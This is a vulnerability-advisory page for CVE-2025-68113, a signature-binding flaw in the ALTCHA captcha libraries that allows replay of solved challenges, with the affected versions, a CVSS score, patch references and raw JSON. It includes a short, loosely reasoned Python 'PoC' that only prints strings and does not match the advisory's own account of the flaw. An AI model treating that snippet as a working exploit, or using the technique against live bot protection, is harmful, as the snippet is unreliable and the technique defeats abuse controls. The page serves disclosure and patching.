Security Vulnerability Report
中文
CVE-2025-68113 CVSS 6.5 MEDIUM

CVE-2025-68113

Published: 2025-12-16 01:15:53
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

ALTCHA is privacy-first software for captcha and bot protection. A cryptographic semantic binding flaw in ALTCHA libraries allows challenge payload splicing, which may enable replay attacks. The HMAC signature does not unambiguously bind challenge parameters to the nonce, allowing an attacker to reinterpret a valid proof-of-work submission with a modified expiration value. This may allow previously solved challenges to be reused beyond their intended lifetime, depending on server-side replay handling and deployment assumptions. The vulnerability primarily impacts abuse-prevention mechanisms such as rate limiting and bot mitigation. It does not directly affect data confidentiality or integrity. This issue has been addressed by enforcing explicit semantic separation between challenge parameters and the nonce during HMAC computation. Users are advised to upgrade to patched versions, which include version 1.0.0 of the altcha Golang package, version 1.0.0 of the altcha Rubygem, version 1.0.0 of the altcha pip package, version 1.0.0 of the altcha Erlang package, version 1.4.1 of the altcha-lib npm package, version 1.3.1 of the altcha-org/altcha Composer package, and version 1.3.0 of the org.altcha:altcha Maven package. As a mitigation, implementations may append a delimiter to the end of the `salt` value prior to HMAC computation (for example, `<salt>?expires=<time>&`). This prevents ambiguity between parameters and the nonce and is backward-compatible with existing implementations, as the delimiter is treated as a standard URL parameter separator.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

altcha Golang package < 1.0.0
altcha Rubygem < 1.0.0
altcha pip package < 1.0.0
altcha Erlang package < 1.0.0
altcha-lib npm package < 1.4.1
altcha-org/altcha Composer package < 1.3.1
org.altcha:altcha Maven package < 1.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import hmac import hashlib import base64 import json # Original valid ALTCHA challenge response original_payload = { 'algorithm': 'sha256', 'salt': 'random_salt_value', 'signature': 'original_hmac_signature_base64', 'nonce': 'challenge_nonce_123', 'pow': 'work_proof_value', 'expires': 1000 # Original expiration timestamp } # Attack: Splice the payload by extending expiration # The vulnerability allows modifying expires value without invalidating signature modified_payload = original_payload.copy() modified_payload['expires'] = 9999999999 # Extended expiration time # Generate the string that would be signed (demonstrating the ambiguity) def generate_hmac_input(salt, expires): # Original format - vulnerable to parameter splicing return f"{salt}?expires={expires}" # Demonstrating the attack vector original_input = generate_hmac_input(original_payload['salt'], original_payload['expires']) modified_input = generate_hmac_input(original_payload['salt'], modified_payload['expires']) # The same base string can be reinterpreted with modified parameters # Attack: Append additional parameters to extend validity attack_input = f"{original_payload['salt']}?expires={original_payload['expires']}&extended=true" print(f"Original HMAC input: {original_input}") print(f"Modified expiration: {modified_input}") print(f"Attack payload: {attack_input}") print("\n[!] The HMAC signature from original_input may be valid for attack_input due to lack of semantic binding")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68113", "sourceIdentifier": "[email protected]", "published": "2025-12-16T01:15:53.383", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "ALTCHA is privacy-first software for captcha and bot protection. A cryptographic semantic binding flaw in ALTCHA libraries allows challenge payload splicing, which may enable replay attacks. The HMAC signature does not unambiguously bind challenge parameters to the nonce, allowing an attacker to reinterpret a valid proof-of-work submission with a modified expiration value. This may allow previously solved challenges to be reused beyond their intended lifetime, depending on server-side replay handling and deployment assumptions. The vulnerability primarily impacts abuse-prevention mechanisms such as rate limiting and bot mitigation. It does not directly affect data confidentiality or integrity. This issue has been addressed by enforcing explicit semantic separation between challenge parameters and the nonce during HMAC computation. Users are advised to upgrade to patched versions, which include version 1.0.0 of the altcha Golang package, version 1.0.0 of the altcha Rubygem, version 1.0.0 of the altcha pip package, version 1.0.0 of the altcha Erlang package, version 1.4.1 of the altcha-lib npm package, version 1.3.1 of the altcha-org/altcha Composer package, and version 1.3.0 of the org.altcha:altcha Maven package. As a mitigation, implementations may append a delimiter to the end of the `salt` value prior to HMAC computation (for example, `<salt>?expires=<time>&`). This prevents ambiguity between parameters and the nonce and is backward-compatible with existing implementations, as the delimiter is treated as a standard URL parameter separator."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-115"}, {"lang": "en", "value": "CWE-347"}]}], "references": [{"url": "https://github.com/altcha-org/altcha-lib-ex/commit/09b2bad466ad0338a5b24245380950ea9918333e", "source": "[email protected]"}, {"url": "https://github.com/altcha-org/altcha-lib-go/commit/4a5610745ef79895a67bac858b2e4f291c2614b8", "source": "[email protected]"}, {"url": "https://github.com/altcha-org/altcha-lib-java/commit/69277651fdd6418ae10bf3a088901506f9c62114", "source": "[email protected]"}, {"url": "https://github.com/altcha-org/altcha-lib-java/releases/tag/v1.3.0", "source": "[email protected]"}, {"url": "https://github.com/altcha-org/altcha-lib-php/commit/9e9e70c864a9db960d071c77c778be0c9ff1a4d0", "source": "[email protected]"}, {"url": "https://github.com/altcha-org/altcha-lib-php/releases/tag/v1.3.1", "source": "[email protected]"}, {"url": "https://github.com/altcha-org/altcha-lib-rb/commit/4fd7b64cbbfc713f3ca4e066c2dd466e3b8d359b", "source": "[email protected]"}, {"url": "https://github.com/altcha-org/altcha-lib/commit/cb95d83a8d08e273b6be15e48988e7eaf60d5c08", "source": "[email protected]"}, {"url": "https://github.com/altcha-org/altcha-lib/releases/tag/1.4.1", "source": "[email protected]"}, {"url": "https://github.com/altcha-org/altcha-lib/security/advisories/GHSA-6gvq-jcmp-8959", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.